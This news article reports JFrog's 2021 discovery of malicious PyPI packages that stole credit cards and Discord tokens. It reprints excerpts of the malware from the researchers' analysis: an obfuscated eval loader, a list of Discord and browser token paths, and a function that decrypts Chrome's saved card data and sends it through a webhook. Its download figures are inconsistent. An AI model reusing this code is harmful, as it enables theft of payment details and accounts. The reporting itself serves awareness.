Python Official Repository Found to Be Housing Credit-Card Stealing Malware

Many perceive it to be due to negligence by Python's moderators.

TL;DR

JFrog cybersecurity researchers, on July 29, 2021, have detected malicious packages existing in PyPI, Python's official library. The packages were comprised of credit-card stealing malware.

They easily distribute viruses and launch successful attacks on developers and CI/CD pipelines.
They easily distribute viruses and launch successful attacks on developers and CI/CD pipelines.
Key Facts
  1. 1

    Eight different packages were listed as malware.

  2. 2

    The packages spawn of the devil were downloaded more than 30 times from PyPI.

  3. 3

    The malicious packages also impersonate users with the use of Discord codes.

Details

The rate at which PyPI and other public repositories have been vulnerable to frequent supply chain attacks that could have been easily fended off with proper security is appallingly alarming. RubyGems, PyPI, npm have corrupted repositories and unsuspecting developers in common. Streams of supply chain attacks, big and small, take place on these hubs, waiting for trusting developers to download them, natural order.

In this case, eight different packages from 3 maintainers were detected in PyPI's library hub. They were taken down immediately after JFrog informed PyPI, but they had been downloaded over 30,000 times, according to data from pepy.tech. Inconveniently enough, research is still on to determine the actual impact of this attack.

According to JFrog, credit card details stealing wasn't the only activity the packages were orchestrating; using code from the Discord messaging platform, the actors could impersonate the user.

This would seem like a more minor event than the dependency confusion attacks uncovered by Sonatype in the earliness of March. That attack was greater in both the targets (Amazon, Microsoft, Zillow, Lyft), the tension, and the impact. A name familiar with the incident that had Microsoft hire researchers to attack itself and this incident is Python thanks to its fallible repository, PyPI. In the history of studies, almost half of the packages in PyPI have been indicated with a security hole. Public repository moderators have to step up security when it comes to uploaded packages. While a no-trust approach would be seen as "going too far," malicious actors currently have their jobs too easy. They easily distribute viruses and launch successful attacks on developers and CI/CD pipelines.

The continued discovery of malicious software packages in popular repositories like PyPI is an alarming trend that can lead to widespread supply chain attacks. The ability for attackers to use simple obfuscation techniques to introduce malware means developers have to be concerned and vigilant
avatar
Asaf Karas
CTO Security at JFrog

The lack of moderation and automated security safeguards in PyPI and other public software repositories, according to the researchers, makes it relatively easy for threat actors to inject harmful code.

Getting around obfuscation might have proven to be challenging for the boy scouts but not JFrog's array of impressive tools.

Below is a brief version of the noblesse 2 main code:

import base64, codecs
magic = 'aW1wb3J0IGNvbG9yYW1hLCBkYXRldGltZS...'
love = '0iLKOcY3L4Y2q1nJkxpl97nJE9Y2EyoTI0M...'
god = 'a2luZy5hcHBlbmQodG9rZW4pDQogICAgICAg...'
destiny = 'yxIKAVDaAQK3xjpQWkqRAboUcBIzqjEmS...'
joy = '\x72\x6f\x74\x31\x33'
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64...')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'','exec'))

And here, the Discord authentication token stealer code.

local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')

paths = {
    'Discord': roaming + '\\Discord',
    'Discord Canary': roaming + '\\discordcanary',
    'Discord PTB': roaming + '\\discordptb',
    'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
    'Opera': roaming + '\\Opera Software\\Opera Stable',
    'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
    'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}

Noblesse payload #2 – Stealing Autocomplete sensitive data.

{
  "type": 1,
  "id": "807327703082074143",
  "name": "Captain Hook",
  "avatar": null,
  "channel_id": "725001140324008047",
  "guild_id": "720931953251057725",
  "application_id": null,
  "token": "uwAgm7PQaROJB3USUNDv1RT7uJzfidUsHBsC_y0p2qtChlzNVgpG1vw2zAtkFX-8Xq-x"
}

For users that do this:

image.png

This is what the malware sees:

def cs():
    master_key = master()
    login_db = os.environ['USERPROFILE'] + os.sep + \
        r'AppData\Local\Google\Chrome\User Data\default\Web Data'
    shutil.copy2(login_db,
                 "CCvault.db")
    conn = sqlite3.connect("CCvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT * FROM credit_cards")
        for r in cursor.fetchall():
            username = r[1]
            encrypted_password = r[4]
            decrypted_password = dpw(
                encrypted_password, master_key)
            expire_mon = r[2]
            expire_year = r[3]
            hook.send(
							f"CARD-NAME: " + 
							username + 
							"\nNUMBER: " 
							+ decrypted_password + 
							"\nEXPIRY M: " + 
							str(expire_mon) + 
							"\nEXPIRY Y: " + 
							str(expire_year) + 
							"\n" + 
							"*" * 10 + 
							"\n"
						)

JFrog suggests that developers must thread carefully when downloading from public repositories, verify library signatures in their CI/CD pipelines, and, if needed, acquire tools that flag malicious code.


Get similar stories in your inbox weekly, for free

Is this news interesting? Share it with your followers

Latest stories


DevOps: Report on Devil's Practices by DORA

The report is drafted from a report release of the annual research and survey of …

Amazon Elasticsearch Gets a New Version With Name Deprecated

Accompanied by new advancements is Amazon OpenSearch, the same body of code as its predecessor, …

McAfee Partners With IBM Security to Deliver TD Synnex Security Solution

The MVISION platform and Security wing of IBM's partnership endgame are to extend increased protection …

Amazon MSK Connect Launched to Better Apache Kafka UX

Amazon follows up on its 2018 data streaming software, Amazon Managed Streaming for Apache Kafka, …

Cloud: Zone Redundant Storage Released on General Availability

The report is drafted from a press release of the Microsoft Azure team on the …

Security: IBM Traces Two-Thirds of Compromises to Misconfigured APIs

The report is drafted from a sweeping survey of dark web analysis and various X-Force …